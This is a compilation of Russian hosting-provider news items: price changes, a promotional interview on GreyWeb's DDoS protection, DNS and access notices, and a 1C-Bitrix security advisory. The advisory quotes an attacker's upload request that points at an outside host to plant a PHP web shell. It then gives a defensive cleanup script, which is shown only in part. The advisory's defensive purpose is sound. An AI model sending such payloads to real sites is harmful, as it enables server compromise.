С 1 января 2026 года цены на выпуск SSL-сертификатов и администрирование включают НДС 22%



С 1 января 2026 года в стоимость выпуска SSL-сертификатов и администрирования будет включен НДС 22% вместо текущих 20%.

Есть и хорошие новости! Изменения не коснутся решений, которые входят в реестр российского ПО:
  • ispmanager 6 (все версии);
  • модули интеграции с BitNinja и DDoS-Guard;
  • модуль интеграции с каталогом вебскриптов Softaculous;
  • модуль интеграции с веб-сервером LiteSpeed.
Эти продукты не подлежат обложению НДС по ч.2 ст.149 НК РФ.

CEO Сергей Сергей раскрывает, как GreyWeb бросил вызов индустрии, создал свою «альтернативу Cloudflare» и сделал ваш сайт МЕНЕЕ УЯЗВИМЫМ к атакам и санкциям!




Про УТП, зарождение проекта и свою нишу на рынке
Валерия Таруашвили, маркетолог ispmanager
Сергей, расскажите о проекте GreyWeb: как он зародился и в чём его УТП на высококонкурентном рынке хостинга?

Сергей, CEO GreyWeb
GreyWeb начинал свой путь как веб-студия, но со временем амбиции и растущая клиентская база привели нас к созданию собственного облачного решения. Изучив рынок, мы заметили, что большинство хостинг-провайдеров предлагают однотипные услуги без реальной гибкости. Поэтому мы сделали ставку на уникальный подход — разработали многофункциональный личный кабинет с единым балансом и возможностью выбора дата-центра для размещения серверов.
Такое решение обеспечивает клиентам максимальную свободу, устойчивость и оптимизацию затрат, делая их инфраструктуру по-настоящему защищённой и независимой.
Второе ноу-хау – собственное ПО для защиты от DDoS-атак. Мы не стали перепродавать готовые решения, а создали доступный аналог Cloudflare для стартапов с ограниченным бюджетом. Переход с Cloudflare занимает всего 5 минут: достаточно создать ЛК в GreyWeb, добавить домен, направить на A-запись, получить сертификат, и сайт проксируется через GreyWeb. Это решило проблему централизованности Cloudflare, санкций и потерю трафика для клиентов из РФ и СНГ, Многие клиенты переходят к нам для усиленной защиты, дополняя свои текущие SaaS-решения."
Говоря об УТП облачной платформы нельзя не отметить техническую поддержку опытных профессионалов, которая подобно горным шерпам знает все тропы и опасности в мире хостинга и предостерегает своих клиентов от возможных “ловушек” и неожиданных “лавин” из DDoS-атак, заранее готовя для них надёжное укрытие. Все тикеты клиентов разрешаются в индивидуальном порядке, а благодаря проактивному подходу время ожидания клиента сокращено до минимума. Помощь можно получить в формате 24/7, при этом у нас нет никакого ранжирования пользователей, все обслуживаются одинаково на высоком уровне, вне зависимости от того, к какому клиентскому сегменту принадлежат.

За гранью черного и белого: Философия названия GreyWeb
У вас очень интересное название. Есть ли в нём какая-либо отсылка к “серым зонам” в IT, хитростям, за счет которых вам удается предоставить столь продвинутый и конкурентоспособный сервис для пользователя?
На самом деле, никакой скрытой метафоры в нашем названии нет, оно закрепилось ещё со времён веб-студии, и мы решили оставить его, как хорошо знакомое для нашей ЦА и прижившееся. Говоря другими словами, через название просматривается позиционирование себя, как “серой сети”, а серые IP-адреса, как известно, являются недоступными из интернета, а значит и надежно защищенными от прямых атак через DDoS или сканирование портов.
Через название просматривается позиционирование себя, как “серой сети”, а серые IP-адреса, как известно, являются недоступными из интернета, а значит и надежно защищенными от прямых атак через DDoS или сканирование портов.

Про целевую аудиторию
Кто ваша целевая аудитория на сегодняшний день? Как бы вы описали своих конечных клиентов?
На самом деле, у нас очень обширная и плотная целевая аудитория! К числу наших пользователей можно отнести: игровые сообщества (создатели форумов и сайтов), online-предприниматели, медиа-сервисы, стриминговые платформы, EdTech-компании, интернет-магазины и т.д. По сути, клиентом компании GreyWeb может стать абсолютно любой человек, который хочет что-либо разместить в интернет-паутине.

DDoS-атака, изменившая всё: Как GreyWeb создал собственную защиту
Был ли некий «переломный момент», который привел к разработке вашей собственной DDoS-защиты?

Один из программистов GreyWeb
Мой путь в IT начался с работы «белого хакера». Я этично проникал в компьютерные системы и сети по заказу владельцев, чтобы выявлять их уязвимости и повышать безопасность. Именно тогда, глубоко изучая тактики злоумышленников, я, к сожалению, осознал, что существующие на рынке решения для защиты от DDoS, будут не способны полноценно обезопасить компании. Я видел огромные риски, которым подвергаются онлайн-проекты, и, что хуже всего, эти риски далеко не всегда осознаются их владельцами.
Весь процесс DDoS-защиты происходит абсолютно незаметно, в пассивном режиме, за счет таких невидимых методик, как поведенческий анализ, фильтрация по user-agent и скрытые проверки.
Последней каплей стала личная критическая DDoS-атака на один из моих собственных IT-проектов, последствия которой были по-настоящему разрушительными. Тогда я твердо решил: необходимо создать собственное, по-настоящему эффективное ноу-хау для защиты от DDoS-атак. Моей целью было разработать решение, которое способно выявлять и блокировать нелегитимный трафик на самых ранних стадиях, закрывая собой брешь в информационной защите на всех уровнях – сетевом, транспортном, уровне приложения – и быть на голову выше своих предшественников. И по сей день я постоянно работаю над его совершенствованием.
Одним из наших недавних и значимых достижений стала технология, позволяющая полностью обходить проверку браузера пользователя. То есть, даже если на сайт крупного проекта поступает атака, конечные пользователи никогда не будут сталкиваться с распознаванием CAPTCHA или любыми другими видимыми проверками. Весь процесс DDoS-защиты происходит абсолютно незаметно, в пассивном режиме, за счет таких невидимых методик, как поведенческий анализ, фильтрация по user-agent и скрытые проверки.
Мы убеждены, что CAPTCHA безнадежно устарела. С развитием ИИ и машинного обучения боты стали умнее и легко обходят её. Кроме того, CAPTCHA катастрофически ухудшает пользовательский опыт – посетителям приходится проходить «10 кругов ада» с нечеткими изображениями, что вызывает раздражение и негативно сказывается на маркетинге и продажах, ведь многие просто бросают эти тесты на полпути.

DDoS-защита без прикрас: Что скрывают недостатки существующих решений?
Можете поделиться своим мнением о существующих сегодня на рынке решениях по защите от DDoS-атак? Какие слабые стороны и несовершенства в них видите? Есть ли какой-то “секретный ингредиент” в вашей разработке, перекрывающий слабые места предшественников?

Один из программистов GreyWeb
Идеальной защиты не существует, любую можно обойти, но качественное анти-DDoS решение увеличивает стоимость взлома web-ресурсов в десятки и сотни раз. Важно понимать, что помимо самой защиты, критична оптимизация сайта и достаточная мощность облачных ресурсов. Слабый сервер не спасёт даже самая продвинутая защита.
Я долго изучал и тестировал существующие анти-DDoS решения. Они не успевают эволюционировать за быстрыми и изощренными методами хакеров.
Растущая мощность ботнетов перегружает даже мощные системы
Сложные атаки на уровне приложений (Layer 7) требуют более глубокого анализа
Архитектурные ограничения, включая единые точки отказа, делают защиту уязвимой
Что же делает нашу технологию уникальной? Во-первых, это reverse-proxy. Он выступает «прослойкой» и строгим «фейс-контролем» между внешним миром и внутренними ресурсами, фильтруя и обрабатывая входящий трафик для безопасности и повышения производительности.
Во-вторых, наш бот-менеджмент классифицирует входящие запросы по 3 уровням: бот, автоматизация и человек. Это позволяет нам точно выявлять аномалии и временно блокировать соответствующий класс запросов, при этом полностью сохраняя доступность сайта для обычных пользователей – они ничего не замечают. Все запросы сохраняются и архивируются.
Сохранение и архивация истории всех запросов позволяет нам строить достоверную аналитику и метрики для клиентов, представлять отчетность и даже прогнозировать будущие риски на основе ретроспективных данных.
Для повышения точности мы разрабатываем технологию «отпечатков пальцев» (fingerprinting), позволяющую создавать уникальные идентификаторы для каждого клиента и отличать легитимных пользователей от замаскированных ботов. «Отпечаток» собирается из JavaScript данных: версии браузера, ОС, плагинов, оборудования, HTTP-заголовков, user-agent, часового пояса, языковых настроек и разрешения экрана. Все эти атрибуты хешируются в уникальную строку фиксированной длины, идентифицирующую браузер и устройство.
В GreyWeb доступны типы «отпечатков»: JA4, HTTP/2 fingerprint, «отпечаток пальцев» header, TCP-отпечаток. Также предлагается кастомная настройка firewall, WAF и редиректов.
Функционально, наше ПО схоже с Cloudflare, но доступнее: подключение от 450 руб. (базовый набор инструментов: proxy, обход с геолокацией, техподдержка), тогда как тарифы на рынке РФ начинаются от 8 000 руб. Мы стремимся сделать качественную защиту доступной всем, даже начинающим предпринимателям.
У нас есть и бизнес тарифы и лайт, мы хотим защищать всех.

Магия интеграции: Как GreyWeb защищает сайты без делегирования NS-серверов?
Вы упомянули, что владеете технологией удалённой защиты сайтов без делегирования NS-серверов*. Какая технология лежит в основе этого ноу-хау?

Сергей

По сути, это очень удобно, не нужно прибегать к лишним действиям. На схеме ниже представлена логика работы защиты сайта от GreyWeb, наш защищенный IP-адрес изобличает атакующих ботов в числе прочих запросов при помощи proxy-технологии и других методик. Благодаря этому щиту до ресурсов веб-сервера компании могут добраться лишь пользователи и легитимные боты (по типу яндекс метрики и яндекс веб-мастера, которые связаны с поисковиками).

Один из программистов GreyWeb
Подключение сайта начинается с А-записи или CNAME-записи. CNAME обеспечивает дополнительную устойчивость: даже при сбоях в нашем дата-центре (которые устраняются за 5 минут) она гарантирует работоспособность веб-сайта.
Как работает наша технология защиты: входящий запрос сначала поступает в edge-слой, где проверяется на легитимность и может быть перехвачен, если это поисковый бот. Далее запрос отправляется в origin-слой, где работает наш оптимизированный reverse-proxy. Он принимает запрос, перенаправляет его на конечный сервер пользователя, улавливает ответ и возвращает его обратно.
Также в edge-слое происходит кеширование для ускорения загрузки статических страниц. Динамические страницы всегда загружаются напрямую с веб-серверов клиента.

DDoS-защита в разрезе: На каких уровнях GreyWeb отражает атаки?
На каких уровнях сервера ваше решение способно эффективно отражать DDoS-атаки? Есть ли какие-либо ограничения по объёму или сложности атак?

Один из программистов GreyWeb
Я специализируюсь на защите L7 (прикладного уровня), поскольку L4-защитой занимается наш провайдер. Наша задача – сканировать трафик на предмет ботов и потенциальных атак. Существует два основных метода L7-атак: флудеры и браузерные эмуляции.
Флудеры легко блокируются, так как используют предсказуемые шаблоны в HTTP-запросах (например, специфические User-Agent, повторяющиеся параметры). Наш настроенный WAF отбивает их без особых затрат.
Гораздо сложнее браузерные эмуляции. Это наиболее опасный тип атак, имитирующий поведение реального человека: они заходят на сайт, парсят cookie, обходят CAPTCHA, выполняя JavaScript и корректно формируя HTTP-заголовки, получая статус 200. Однако даже с такими атаками наша технология справляется, выявляя их при помощи средств против автоматизации CDP.
Когда речь идёт о массивных DDoS-атаках с сотен тысяч IP-адресов и сотен серверов, один слабый сервер не справится. В таких случаях мы используем sensor-mod, который смягчает атаки, собирая, анализируя данные и принимая решения на основе оценки рисков.
В целом, благодаря нашим проактивным и современным технологиям, мы превосходим другие решения.

География больше не преграда: Секретные механизмы GreyWeb для обхода блокировок
Как ваше решение обходит гео-проблемы с недоступностью сайтов, какие механизмы для этого используете?

Сергей
Здесь нет каких-то особых хитростей, просто мы используем белый IP-адрес, который не находится под санкциями со стороны какого-либо государства. И в случае, даже если появятся какие-либо новые санкции на фоне геополитической обстановки, то мы можем добавить другой IP-адрес, и это никак не повлияет на качество работы сайтов наших пользователей. Иными словами, у нас нет общей ASN, которую можно заблокировать, в этом плане мы независимы и стоим особняком.

Тайная страсть GreyWeb: Признаемся в любви к ispmanager!
Почему свой выбор остановили на панели ispmanager? Чем вам так нравится наше решение?

Сергей
Я начал свой путь в веб-разработке с версий ispmanager 4 и 5, когда ispmanager ещё был частью ISPsystem. Тогда техническая поддержка была на высоком уровне, как и сейчас. Именно поэтому я выбрал долгосрочное сотрудничество с вашей компанией. К тому же, тёмная тема интерфейса ispmanager органично встраивается в дизайн нашего сайта и личного кабинета. Наши клиенты воспринимают VDS/VPS-сервер и встроенную панель управления как единое целое, что важно для позиционирования на российском и зарубежном рынках.

Настройка DDoS-защиты из панели управления: Возможности интеграции GreyWeb и ispmanager
Какие конкретные действия доступны вашим пользователям из панели управления ispmanager по настройке защиты от DDoS-атак, благодаря имеющейся интеграции?

Сергей
Любой человек, который управляет сайтами через ispmanager, может подключить свои домены в панели управления GreyWeb через А запись и защищать их. Все это можно настроить за 5 минут. Тем самым, сайт будет продолжать работать без перебоев и получать трафик с любой точки планеты, не подвергаясь гео блоку.

Идеальная пара: Какие условия нужны для бесперебойной работы GreyWeb и ispmanager?
Есть ли какие-либо ограничения или технические требования к версии панели ispmanager по ОС сервера или конфигурации хостинга для полноценной работы вашей интеграции?

Сергей
Нет, никаких ограничений абсолютно нет, нет никакой разницы, на какой панели поднят сайт, главное, чтобы был доступен в сети интернет. Когда клиент покупает защиту, он видит анализ трафика в моменте с интервалом в 1 час. То есть если в течение 1-го часа были какие-либо атаки, то пользователь увидит их в виде заблокированных запросов (анализ трафика представлен на картинке).

Мощный дуэт: Измеримые выгоды GreyWeb Cloud и ispmanager для вашего бизнеса
Какие измеримые преимущества получают ваши конечные клиенты, которые используют ваше облако вкупе с панелью ispmanager?

Использование облачной инфраструктуры совместно с панелью ispmanager предоставляет клиенту ряд значительных преимуществ, сочетая гибкость и масштабируемость облака с удобством и простотой администрирования, которое предоставляет ispmanager.
К основным УТП тандема GreyWeb и ispmanager можно отнести:
  • Централизованное управление из единого интерфейса (веб-сайты, домены, почтовые ящики, базы данных и т.д.)
  • Автоматизация рутинных задач (мгновенное развертывание сайтов на CMS, настройка почты, бэкапирование и восстановление), по итогу выходит экономия времени и снижается вероятность ошибок

  • Интуитивно понятный интерфейс, который позволяет пользователям с первых дней эффективно управлять сервером и его окружением, даже с минимальным техническим бэкграундом.
Использование облачной инфраструктуры совместно с панелью ispmanager предоставляет клиенту ряд значительных преимуществ, сочетая гибкость и масштабируемость облака с удобством и простотой администрирования, которое предоставляет ispmanager.

На пути к лидерству: Как GreyWeb планирует завоевать рынок?
Какие у вас планы на будущее? Может быть готовите какие-либо новые фичи, которые помогут вам завоевать еще большую долю рынка?

Наша глобальная цель — сделать защиту ещё эффективнее и доступнее широкому сегменту. Сейчас мы внедряем искусственный интеллект (ML) в наше анти-DDoS ПО, чтобы анализ трафика и детекция опасностей стали мощнее и быстрее. Мы также хотим, чтобы современная «начинка» отражалась в пользовательском интерфейсе. Кроме того, мы стремимся предоставлять равные условия пользователям по всему миру, без геополитических фильтров. Все наши тарифы фиксированы, и завышать цены мы не планируем.

greyweb.cloud

Новогодняя распродажа 2025! Скидка 30%!



Новогодняя акция от OWLHOST!
2025 год подходит к концу, и до новогодних праздников остаются считанные дни.
В это волшебное время особенно приятно готовить подарки, и наш подарок —
это надежный хостинг и VPS в Нидерландах со скидкой 30%.

Чтобы воспользоваться новогодним предложением, оформляйте заказ с промо-кодом NEW-YEAR-SALE и получите качественный сервис по праздничной цене.
Новогоднее настроение и стабильная работа проектов — гарантированы!

Обратите внимание: любое волшебство имеет ограниченный срок действия.
Промо-код действует с 20.12.25 по 20.01.26, поэтому не откладывайте решение на потом.

Заказать хостинг можно по ссылке:
www.owlhost.net/ru/services/hosting/
VPS доступны здесь:
www.owlhost.net/ru/services/vps/
Совейка знает толк в хорошем хостинге!
P.S. Отписаться от рассылки можно по этой ссылке.
С уважением, команда OWLHOST

OWLHOST NEW YEAR SALE!
The year 2025 is coming to an end, and the New Year holidays are just around the corner.
This magical season is the perfect time for gifts — and our gift to you is
reliable hosting and VPS in the Netherlands with a 30% discount.

To take advantage of this New Year offer, place your order using the promo code NEW-YEAR-SALE and enjoy high-quality service at a festive price.
New Year vibes and stable project performance are guaranteed!

Please note: every bit of magic has its time limit.
The promo code is valid from December 20, 2025 to January 20, 2026, so don’t miss your chance.

Order hosting here:
www.owlhost.net/ru/services/hosting/
VPS services are available at:
www.owlhost.net/ru/services/vps/
Trust our experience — the Owl knows great hosting!
P.S. You can unsubscribe using this link.
Best regards, OWLHOST Team

Изменение цен на домены .RU и .РФ с 1 января 2026



С 1 января 2026 года ТЦИ (Технический Центр Интернет) изменяет цены на регистрацию и продление доменов в зонах .RU и.РФ, и, как следствие, мы также вынуждены их пересмотреть.

Мы заранее предупреждаем об этом, чтобы у вас было время приобрести домен по выгодной цене, регистрацию которого вы, возможно, откладывали.

Специально для наших пользователей, перед увеличением цен, мы решили провести акцию и снизить цены на регистрацию доменов в этих зонах до конца года.

О деталях акции расскажем далее в письме, сначала расскажем об изменениях цен в новом году.

С 1 января 2026 года цена за регистрацию домена в зонах .RU и.РФ составит 199 рублей, а продление — 399 рублей.

Цена на регистрацию и продление может быть ниже в случае, если:
У вас на аккаунте от 11 до 100 доменов .RU /.РФ
  • Регистрация — 189 ₽
  • Продление — 189 ₽
У вас на аккаунте более 100 доменов .RU /.РФ
  • Регистрация — 169 ₽
  • Продление — 169 ₽

Регистрация по специальной цене до конца 2025 года
До вступления новых цен в силу мы запускаем специальное предложение:
  • Регистрация домена .RU или.РФ — 119 ₽

cp.beget.com/domains/register

Проблемы при работе с Google DNS



Уважаемые клиенты,
В последнее время нами были зафиксированы некоторые проблемы при работе с DNS-серверами Google (8.8.8.8 и 8.8.4.4) из РФ. Это привело к возникновению трудностей у части наших пользователей при доступе в Интернет и установке программного обеспечения на виртуальные серверы.

Чтобы избежать возможных сбоев, рекомендуем вам вручную изменить настройки DNS на ваших серверах следующим образом:
— Назначьте DNS-сервер от Яндекса (77.88.8.8 или 77.88.8.1) основным или дополнительным DNS на вашем виртуальном сервере.

Для вновь создаваемых услуг VPS/VDS наши системы автоматически будут устанавливать следующий порядок приоритетов:
— Основной DNS: Яндекс (77.88.8.8)
— Дополнительный DNS: Google (8.8.8.8)


Приносим искренние извинения за возможные неудобства, вызванные этими изменениями. Мы ценим ваше доверие и оперативно реагируем на возникающие трудности, благодаря чему смогли выявить проблему и предложить оптимальное решение.
Если возникнут дополнительные вопросы или потребуется помощь технической поддержки, пожалуйста, обращайтесь к нам любым удобным способом.
Спасибо за понимание!
⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯
Команда технического отдела вашего хостинга.

Сайт: elenahost.ru
Личный кабинет: billing.elenahost.ru

Сложности с доступом к Личному кабинету у некоторых клиентов



В последние недели мы фиксируем рост числа обращений от пользователей, которые испытывают сложности с доступом к Личному кабинету my.firstvds.ru

Проблема проявляется у некоторых абонентов разных интернет-провайдеров, включая мобильные, домашние и корпоративные сети, независимо от типа устройства или операционной системы.

Наши системы мониторинга и журналы доступа показывают, что инфраструктура сервиса работает штатно. Сбоев или ограничений на стороне FirstVDS не зафиксировано.

В чём может быть проблема
Мы проанализировали обращения и характерные сетевые симптомы и определили, что ограничения могут возникать из-за работы внешних систем фильтрации трафика, которые используют некоторые операторы связи.

В ряде случаев блокировка происходит не по IP-адресу ресурса, а на основании анализа сетевого трафика. На оборудовании глубокой инспекции пакетов (DPI) анализ может выполняться внутри зашифрованных HTTPS / SSL / TLS-сессий, в том числе по признакам, характерным для протоколов или туннелей, мимикрирующих под обычный HTTPS-трафик.

Ограничения могут проявляться в виде:
  • обрывов TLS-соединения на этапе установки сессии;
  • отсутствия ответа сервера после отправки Client Hello;
  • длительных таймаутов без установления защищённого соединения.
Данное поведение не связано с работоспособностью сервиса, серверной инфраструктуры или сетевых ресурсов компании и находится вне зоны нашего контроля.

Для быстрой проверки рекомендуем:
  • открыть Личный кабинет, используя мобильный интернет другого оператора;
  • подключиться к другой сети (например, к домашнему Wi-Fi вместо корпоративного);
  • проверить доступ с другого устройства.
При смене интернет-провайдера, типа подключения или маршрута передачи данных меняются сетевые параметры соединения. В результате трафик может перестать подпадать под правила фильтрации, и доступ к сервису восстанавливается.

Если вы наблюдаете данные симптомы, то это подтверждает, что проблема на уровне фильтрации вашего интернет-провайдера.

Что можно сделать сейчас
В качестве временных решений рекомендуем:
  • Использовать альтернативное подключение, если есть такая возможность.
  • Обратиться в техническую поддержку вашего провайдера и сообщить о проблеме. Обращения позволяют операторам быстрее выявлять и устранять подобные ошибки фильтрации.
Пример обращения к провайдеру:
Прошу зарегистрировать инцидент: отсутствует доступ к ресурсу my.firstvds.ru. Сайт открывается через сети других операторов, но недоступен через вашу сеть. Прошу проверить корректность фильтрации и маршрутизации трафика до указанного ресурса.

Что делаем мы
Мы фиксируем все обращения, связанные с проблемами доступа в Личный кабинет, анализируем сетевые симптомы и взаимодействуем с профильными организациями, чтобы в будущем исключить проблемы. Спасибо за понимание.

Если вы хотите помочь нам быстрее разобраться в ситуации
При обращении в поддержку, пожалуйста, по возможности частично или полностью укажите следующую информацию:
Регион и город, из которого осуществляется подключение.
Интернет-провайдер (название компании).
Тип подключения:
  • мобильный интернет,
  • домашний интернет,
  • корпоративная сеть.
Внешний IP-адрес вашего подключения
(его можно определить на сайтах 2ip.ru или myip.ru).
Какие ресурсы недоступны:
  • Личный кабинет (my.firstvds.ru),
  • основной сайт
  • другие сервисы FirstVDS
Меняется ли ситуация при подключении через другую сеть
(например, мобильный интернет вместо Wi-Fi, VPN).
Примерное время и дата, когда проблема наблюдалась.
Результат MTR до my.firstvds.ru (если есть возможность)

Обратите внимание:
  • ICMP-запросы к биллингу могут быть недоступны — это нормально;
  • для диагностики предпочтительно использовать TCP MTR на порт 443;
  • если MTR обрывается или показывает потери на промежуточных узлах — это также полезная информация.
Если Личный кабинет для создания тикета недоступен, воспользуйтесь чатом на сайте.

https://firstvds.ru

Серверы с локацией Нидерланды теперь будут размещаться в дата-центре Qupra DC2



Все серверы, расположенные в euNetworks, перенесены в новый дата-центр Qupra DC2 в Амстердаме. Услуги работают штатно, стоимость аренды не изменилась.

Открываем новую площадку в Амстердаме — Qupra DC2.

Qupra — надёжный оператор с 30-летним опытом работы. ЦОД спроектирован в соответствии с высокими стандартами безопасности, оснащён резервированными системами электроснабжения и кондиционирования. Подробнее о преимуществах новой площадки рассказали здесь.

Все серверы, расположенные в euNetworks, перенесли в новый дата-центр. Миграция прошла бесшовно: стоимость аренды серверов не изменилась, а все услуги работают в штатном режиме.

https://firstvds.ru

Риск DOS-атак на 1C-Битрикс: удалите демо-компоненты



За последнюю неделю наша техническая поддержка фиксирует участившиеся попытки несанкционированно регистрировать новых пользователей через демо-компоненты 1С-Битрикс.

Что такое «демо-компоненты». Это тестовый набор информации (пользователи, товары, статьи), который система устанавливает «из коробки», чтобы сразу показать свои возможности. Вендор требует удалять все установочные и демо-компоненты, внимательно настраивать опции самостоятельной регистрации пользователей при запуске реального сайта.

Впервые о проблеме заговорили более двух лет назад. Некорректная настройка системы позволяет злоумышленнику зарегистрироваться на сайте под видом обычного пользователя, даже если администратор полностью отключил публичную регистрацию в настройках. Это происходит из-за неудаленной демо-формы с возможностью самостоятельной регистрации пользователя.

Если в вашей админ-панели постоянно добавляются пользователи с логином bitrixsupport_, возможно, ваш проект настроен неправильно.

Как это работает
Злоумышленник пользуется тем, что администратор не отключил самостоятельную регистрацию пользователей. Он создаёт фейковые учётные записи с именами, начинающимися на bitrixsupport_, чтобы маскировать их под технические. А затем использует их для создания избыточной нагрузки. Проблема временно устраняется только после полной перезагрузки сервера или веб-сервера.

После успешной регистрации пользователи bitrixsupport_ выполняют запросы вида:
POST /bitrix/tools/landing/ajax.php?action=Site::uploadFile

с нагрузкой
data[picture]=http://sql.bling.org/bx/<ваш_домен>.<ru>_xx/.description.php

в попытке загрузить php-шелл на сервер.

Нам попадались случаи, где такой запрос провоцировал DOS, но это не приводило к загрузке веб-шелла.

Попытка выполнения запроса от пользователя без регистрации приводит к ошибке «Недостаточно прав», и такое соединение сразу же закрывается в отличие от запросов пользователей bitrixsupport_.

DOS-атака может задевать apache веб-сервер, тогда сайт начинает отдавать 504 ошибку (Gateway Timeout) или MySQL начинает отдавать ошибку Error 1040: Too Many Connections.

Что нужно сделать
Удалите ненужных пользователей с префиксом bitrixsupport_.
Запомните: «1С-Битрикс» никогда не создает на ваших сайтах или в Битрикс24 неизвестные учётные записи. Такие аккаунты могут появиться только по вашей инициативе или в результате действий злоумышленника.

Как удалить. Перейдите в административную панель 1С-Битрикс по адресу:

/bitrix/admin/user_admin.php

Найдите и удалите всех пользователей с префиксом bitrixsupport_— это не системные аккаунты, они не нужны и небезопасны.

Обновите 1С-Битрикс до последней версии.
Выполните перезапуск сервера или веб-сервера Apache/Nginx, чтобы очистить соединения и завершить сессии.
Для дополнительной безопасности ограничьте доступ к формам регистрации.
Для автоматизации администратор может использовать скрипт, который сделает всё автоматически.
#!/bin/bash

# Bitrix Reg Security Fix v.0.0.5 beta - защита от уязвимости регистрации
# 1. .htaccess - блокирует регистрацию пользовталей в ядре 1С Битрикс через демо-скрипты Bitrix
# 2. MySQL - удаляет пользователей bitrixsupport_* с подтверждением
# 3. nginx - блокирует все ?register=yes запросы с подтверждением
#            может сломать некоторые скрипты на сайте
#            перед использованием нужно проконсультироваться с разработчиком
#
# Автоматически определяет Bitrix Env, Docker, ISP Manager, проверяет nginx синтаксис до и после правок
# Применение скрипта на свой страх и риск
#
# Дебаг
# set -x -v

red="$(tput setaf 1)$(tput bold)"
green="$(tput setaf 2)$(tput bold)"
reset="$(tput sgr0)"

# show script version
self_current_version="Bitrix Reg Security Fix v.0.0.5 beta"
printf "\n${green}$self_current_version\n${reset}"

# check privileges
if [[ $EUID -ne 0 ]]; then
	printf "\n${red}ERROR${reset} - This script must be run as root" 
	exit 1
fi

# one instance run lock
LOCKFILE=/tmp/bitrix_reg_fix.lock
exec 9>$LOCKFILE

if ! flock -n 9; then
    echo
    if command -v lsof >/dev/null 2>&1; then
        PID=$(lsof -t "$LOCKFILE" 2>/dev/null | grep -v "^$$\$" | head -n1)
        printf "%s is ${red}already locked${reset} by PID %s\n\n" "$LOCKFILE" "$PID"
    elif command -v fuser >/dev/null 2>&1; then
        PID=$(fuser "$LOCKFILE" 2>/dev/null | tr ' ' '\n' | grep -v "^$$\$" | head -n1)
        printf "%s is ${red}already locked${reset} by PID %s\n\n" "$LOCKFILE" "$PID"
    else
        printf "%s ${red}already exists${reset}\n\nInstall 'lsof -t' or 'fuser' to see the PID.\n" "$LOCKFILE"
    fi
    exit 1
fi

trap 'exec 9>&-; rm -f "$LOCKFILE"' EXIT

bitrix_fix_reg_paths () {
    echo
    if ! command -v nginx &> /dev/null; then
        echo "${red}ERROR.${reset} Nginx was not found"
        return 1
    fi

    echo "${green}Checking nginx paths${reset}" && echo

    htaccess_directives=("Order allow,deny" "Deny from all")
    
    # Define relative paths to check/create .htaccess files
    rel_paths=(bitrix/wizards/bitrix/demo/public_files/ru/auth/.htaccess \
               bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/custom-registration/.htaccess \
               bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/my-components/.htaccess \
               bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/.htaccess \
               install/wizards/bitrix/infoportal/site/public/ru/personal/profile/.htaccess \
               install/wizards/bitrix/infoportal/site/public/ru/board/my/.htaccess)
    
    # Find all nginx root directives (standard root)
    mapfile -t roots < <(grep -RhoP '^\s*root\s+"?\K[^";]+' /etc/nginx | tr -d '"' | sort -u)
    
    # Find all nginx root_path directives (set $root_path)
    mapfile -t root_paths < <(grep -RiIn "root_path " /etc/nginx | grep -oP 'set \$\w+\s+\K[^;]+' | tr -d ';' | tr -d '"' | sort -u)
    
    # Combine both types of paths
    all_paths=("${roots[@]}" "${root_paths[@]}")
    
    # Remove duplicates while preserving order
    declare -A seen
    unique_paths=()
    for path in "${all_paths[@]}"; do
        if [[ ! "${seen[$path]}" ]]; then
            seen["$path"]=1
            unique_paths+=("$path")
        fi
    done
    
    targets=()
    
    for root in "${unique_paths[@]}"
    do
        # Clean up path (remove trailing spaces/special characters)
        root=$(echo "$root" | xargs)
        
        for rel in "${rel_paths[@]}"
        do
            f="$root/$rel"
            d="$(dirname "$f")"
            
            # Check if directory exists
            if [ -d "$d" ]; then
                if [ -f "$f" ]; then
                    all_directives_exist=true
                    for directive in "${htaccess_directives[@]}"; do
                        if ! grep -q "^[[:space:]]*$directive" "$f"; then
                            all_directives_exist=false
                            break
                        fi
                    done
                    
                    if [ "$all_directives_exist" = false ]; then
                        printf '[DRY-RUN] would update: %s %s(file exists and will be updated)%s\n' "$f" "$green" "$reset"
                        targets+=("$f")
                    fi
                else
                    printf '[DRY-RUN] would create: %s %s(not exist, will be created)%s\n' "$f" "$green" "$reset"
                    targets+=("$f")
                fi
            fi
        done
    done
    
    [ "${#targets[@]}" -ne 0 ] && {
        printf '\nApply changes? [Y/n]: '
        read -r ans
        case "${ans:-Y}" in
            Y | y)
                for f in "${targets[@]}"
                do
                    if [ -f "$f" ]; then
                        temp_file="$(mktemp)"
                        printf "Order allow,deny\nDeny from all\n\n" > "$temp_file"
                        \cat "$f" >> "$temp_file"
                        temp_result="$(mktemp)"
                        \head -n 2 "$temp_file" > "$temp_result"
                        \tail -n +3 "$temp_file" | \
                        \grep -v "^[[:space:]]*Order allow,deny$" | \
                        \grep -v "^[[:space:]]*Deny from all$" >> "$temp_result"
                        \mv -f "$temp_result" "$f"
                        \rm -f "$temp_file"
                        printf '[OK] updated: %s\n' "$f"
                    else
                        mkdir -p "$(dirname "$f")"
                        printf "Order allow,deny\nDeny from all\n\n" > "$f"
                        printf '[OK] created: %s\n' "$f"
                    fi
                done
            ;;
            *)
                printf 'Aborted\n'
            ;;
        esac
    } || printf "${green}No Bitrix paths found in nginx that need updating${reset}\n"
}

mysql_all_db_del_bitrixsupport () {
	echo

	found_any=0
	mysql_accessible=0

	check_mysql_connection() {
		local container_id="$1"
		if [[ -n "$container_id" ]]; then
			docker exec "$container_id" mysql -e "SELECT 1;" &>/dev/null
		else
			mysql -e "SELECT 1;" &>/dev/null
		fi
	}

	process_deletion_confirm() {
		local db="$1"
		local container_id="$2"
		local container_image="$3"

		echo -e "${red}Found bitrixsupport_% users${reset}\nDatabase: $db\nContainer: ${container_image:-local} (${container_id:-host})\n"

		if [[ -n "$container_id" ]]; then
			docker exec "$container_id" mysql -e \
			"USE $db; SELECT ID,LOGIN,DATE_REGISTER FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" | column -t 2>/dev/null
		else
			mysql -e \
			"USE $db; SELECT ID,LOGIN,DATE_REGISTER FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" | column -t 2>/dev/null
		fi

		echo
		read -r -p "Delete these users from $db? [Y/n] " yn </dev/tty
		yn=${yn:-Y}

		if [[ "$yn" =~ ^[Yy]$ ]]; then
			if [[ -n "$container_id" ]]; then
				docker exec "$container_id" mysql -N -e \
